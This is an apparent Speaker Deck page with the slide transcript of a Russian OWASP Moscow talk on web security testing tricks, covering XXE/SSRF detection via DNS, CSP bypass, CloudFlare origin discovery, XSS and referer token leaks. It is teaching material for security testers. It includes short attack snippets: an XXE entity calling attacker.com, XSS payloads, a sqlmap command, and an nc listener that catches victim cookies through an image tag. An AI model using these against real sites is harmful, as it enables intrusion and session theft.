Upgrade to Pro — share decks privately, control downloads, hide ads and more …

"Трюки при анализе защищенности веб приложений – продвинутая версия", Сергей Белов

47a3212bc9721c62f1135ead56569f17?s=47 OWASP Moscow
December 04, 2017
Technology
0
40

"Трюки при анализе защищенности веб приложений – продвинутая версия", Сергей Белов

OWASP Russia Meetup #1

47a3212bc9721c62f1135ead56569f17?s=128

OWASP Moscow

December 04, 2017
Tweet

More Decks by OWASP Moscow

See All by OWASP Moscow
47a3212bc9721c62f1135ead56569f17?s=48 owaspmoscow
0
32
47a3212bc9721c62f1135ead56569f17?s=48 owaspmoscow
0
150
47a3212bc9721c62f1135ead56569f17?s=48 owaspmoscow
0
310
47a3212bc9721c62f1135ead56569f17?s=48 owaspmoscow
0
140
47a3212bc9721c62f1135ead56569f17?s=48 owaspmoscow
0
120
47a3212bc9721c62f1135ead56569f17?s=48 owaspmoscow
0
140
47a3212bc9721c62f1135ead56569f17?s=48 owaspmoscow
0
120
47a3212bc9721c62f1135ead56569f17?s=48 owaspmoscow
0
99
47a3212bc9721c62f1135ead56569f17?s=48 owaspmoscow
0
90

Other Decks in Technology

See All in Technology
B0cd2f94d292187c9baaf34b3979154d?s=48 quandohr
1
1.6k
97a7f7899e0df28c3636b8d44bbe6578?s=48 korodroid
0
160
69b93af68320a590f607c296e8edff73?s=48 k1low
8
2.1k
3e43337419f62a7e3eefc1b81145a987?s=48 yutakasugiura
0
1.3k
462feb0fe0493c40d55650da664e8773?s=48 clustervr
PRO
0
150
B22a79a9c1bf42c1825ce42dedd41765?s=48 shinpsan
1
350
C4c6c7b4fdf9285bcf12c5caa58c8d53?s=48 nyk510
8
5.4k
8e308462954f8c38cc60dabb8b7bc6a3?s=48 widstkyi
0
270
6500a96a5f0786d7ff0c53429d691ae6?s=48 kazuhiro4949
1
210
66310d2dc1c18188f722d71dfb444bad?s=48 tatsumin39
0
420
81c7a276a2c5944a9b8bdd9cc1a43250?s=48 takatoshiroto
0
110
717e348de96d4638d6ff04aad91bc594?s=48 akanuma
1
220

Featured

See All Featured
5f2da528927a2ec9ba4fec2069cbc958?s=48 kneath
294
39k
1b8ad785acdd1ce1c99914b1c2a4e10e?s=48 sugarenia
233
910k
1177e050db6bafe62885362edf6e3537?s=48 lauravandoore
12
1.9k
C0b42577cfc2b321be3474618107e933?s=48 samanthasiow
59
6.6k
20bfe76b3d6105641f879fe45cfc9272?s=48 bkeepers
PRO
409
58k
F29327647a9cff5c69618bae420792ea?s=48 tenderlove
55
3.6k
96270e4c3e5e9806cf7245475c00b275?s=48 addyosmani
1347
200k
1177e050db6bafe62885362edf6e3537?s=48 lauravandoore
442
29k
7c8469ee8c9e594c65c59b919626c08d?s=48 scottboms
252
11k
433acaea1012b25d97ae66da9b998dad?s=48 malarkey
120
16k
D67fff74178013024d833b3eec6cf27f?s=48 lynnandtonic
274
17k
E4f5d494ebdc9e7cce1aecf3ce3e8bc1?s=48 shpigford
371
43k

Transcript

  1. Трюки при анализе защищенности веб-приложений - продвинутая версия Сергей Белов

    Digital Security OWASP Moscow, 6 Dec 2014

  2. Work/Activity BugHuting Speaker Hey 2

  3. XXE/SSRF detection via DNS

  4. XXE/SSRF detection via DNS SSRF: 1) Предложить сайт <ссылка на

    сайт> 2) Бот проверяет сайт 3) Вместо внешнего сайта подставляется локальный адрес / заменяется схема (file:///)

  5. XXE/SSRF detection via DNS XXE: 1) XML <?xml version="1.0" encoding="ISO-8859-1"?>

    2) С сущностью <!ENTITY xxe SYSTEM «http://attacker.com» >]> 3) Парсер пытается подгрузить сущность с внешнего сайта

  6. XXE/SSRF detection via DNS Сложности при поиске: 1) Есть или

    нет? 2) Время запроса 3) Firewall 4) Другие ограничения

  7. XXE/SSRF detection via DNS DNS leak DNS server

  8. XXE/SSRF detection via DNS В ссылке есть домен -> должен

    быть resolve домена

  9. XXE/SSRF detection via DNS Инструкция 1) Свой сервер (VPS) –

    12.34.56.78 1) Ставим attacker.com свои NS сервера NS1: 12.34.56.78; NS2: 12.34.56.78 2) dnschef 3) python dnschef.py -i 0.0.0.0

  10. XXE/SSRF detection via DNS Реальный пример Говорят – переходит по

    ссылкам в чате...

  11. XXE/SSRF detection via DNS Сценарий 1 1) User 1 ->

    User 2 http://skype-example.com 2) # cat access.log | grep “skype-example” | wc –l 3) 0 

  12. XXE/SSRF detection via DNS Сценарий 2 – DNS Поймали :]

  13. CSP bypass – js as image

  14. CSP bypass – js as image

  15. CSP bypass – js as image Картинка == js файл

    Gif injector - http://pastebin.com/6yUbfGX5

  16. CSP bypass – js as image 1) Возможность загружать файлы

    на разрешенные домены в CSP 2) Загрузить картинку<->js и сделать инклуд <script src=“.../image.gif”></script> Свежие хромы научились блочить подобное 

  17. CloudFlare – real IP detection

  18. CloudFlare – real IP detection

  19. CloudFlare – real IP detection

  20. CloudFlare – real IP detection CloudFlare Free, Pro and Business

    plan: We do not proxy wildcard records CloudFlare Enterprise: For CloudFlare Enterprise customers, we do proxy wildcard records

  21. CloudFlare – real IP detection ping randoOm.victim.com => REAL IP

  22. XSS && urlencode

  23. XSS & urlencode Web Server ?xss=<script>alert(1)</script>

  24. XSS & urlencode 1) Не все web серверы выполняют urldecode

    2)  XSS подставляется, но после urlencode 3) XSS не выполняется  4) На помощь приходит... IE!

  25. XSS & urlencode Только после знака вопроса

  26. XSS & urlencode А если... http://domain.com/path/<xss_here>/etc/

  27. XSS & urlencode http://domain.com/path/<xss>/etc/ IE Only (v11 inc): header("Location: http://domain.com/path/<xss>/etc/");

  28. XSS & urlencode

  29. SQLmap

  30. SQLmap

  31. SQLmap -u http://vuln.com/vote.php --data="id=1&hash=2“ --eval="import hashlib;hash=hashlib.md5(‘123$id456').hexdigest()"

  32. Сложных ситуации - bugbounty

  33. Situation #1 – Same Site Scripting XXXYYYZZZ.target.com => 127.0.0.1 What’s

    wrong?

  34. Situation #1 – Same Site Scripting

  35. Situation #1 – Same Site Scripting External IP – 12.34.56.78

    Loopback – 127.0.0.1

  36. Situation #1 – Same Site Scripting Attacker: 1) nc –lv

    10024 2) email to victim@corp.xxx with <img src = http://xxyyzz.target.com:10024 > Victim: 1) Open email and... 2) Load image with *.target.com cookies! (that’s is why important to know howto correctly set cookies - http://habrahabr.ru/post/143276/)

  37. Situation #1 – Same Site Scripting http://localhost.domain.com:631/<SCRIPT>XSS</SCRIPT>.s html

  38. Situation #1 – Same Site Scripting 38 XXXYYYZZZ.target.com => 10.0.0.22

    http://lab.onsec.ru/2013/07/insecure-dns-records-in-top-web-projects.html

  39. Situation #1 – Same Site Scripting 39 https://hackerone.com/reports/1509 - $100

  40. Situation #2 – Self XSS

  41. Situation #2 – Self XSS XSS only for you –

    no impact?

  42. Situation #2 – Self XSS

  43. Situation #2 – Self XSS Requirements: 1)CSRF for logout O_o

    2)CSRF for login o_O

  44. Situation #2 – Self XSS Steps: 1) Save (self)XSS for

    you 2) Logout victim 3) Login victim w/ your creds 4) Draw window 5) Catch user’s creds!

  45. Situation #2 – Self XSS Google and self-XSS

  46. Situation #2 – Self XSS Share account and attack your

    victim

  47. Situation #3 – evil HTTP referers

  48. Situation #3 - HTTP referer <a href=“http://external.com”>Go!</a> In request headers:

    ... Referer: http://yoursite.com/ ... But what about external resources on web page such as images, styles...?

  49. Situation #3 - HTTP referer http://super-website.com/user/passRecovery?t=SECRET ... <img src=http://comics-are-awesome.com/howto-choose- password.jpg>

    ... Owner of comics-are-awesome.com know all _SECRET_ tokens (from referer)!

  50. Situation #3 - HTTP referer https://hackerone.com/reports/738 - $100

  51. Situation #5 - Content-Security-Policy

  52. Situation #5 - Content-Security-Policy

  53. Situation #5 - Content-Security-Policy CSP only for some browsers! Is

    it ok?

  54. Situation #5 - Content-Security-Policy 1) Forks with diff UA 2)

    Proxy cache 3) Load balancer... Bug hunter got $100, but...

  55. Situation #5 - Content-Security-Policy Fail! Why: • ‘Partial support in

    Internet Explorer 10-11 refers to the browser only supporting the 'sandbox' directive by using the 'X-Content-Security-Policy' header. • Partial support in iOS Safari 5.0-5.1 refers to the browser recognizing the X-Webkit-CSP header but failing to handle complex cases correctly, often resulting in broken pages. • Chrome for iOS fails to render pages without a connect-src 'self' policy. • Old FF problems (some versions between XX and YY)

  56. Situation #6 - Usernames

  57. Situation #6 - Usernames http://website.com/username

  58. Situation #6 - Usernames Okay! Let’s register: http://website.com/robots.txt http://website.com/sitemap.xml ...

  59. Situations XXX

  60. Situations XXX • Info disclose via CSS files (full path

    disclosure while compilation - file\:\/\/\/applications\/hackerone\/releases\/201402211759 29\/app\/assets\/stylesheets\/application\/browser-not- supported\.scss (bug #2221) • SPF and same records • Short tokens • Pixel flood attack • CSRF for login/logout!? (hi Michal Zalewski!) • ... - https://hackerone.com/security?show_all=true

  61. Thanks! Questions? @sergeybelove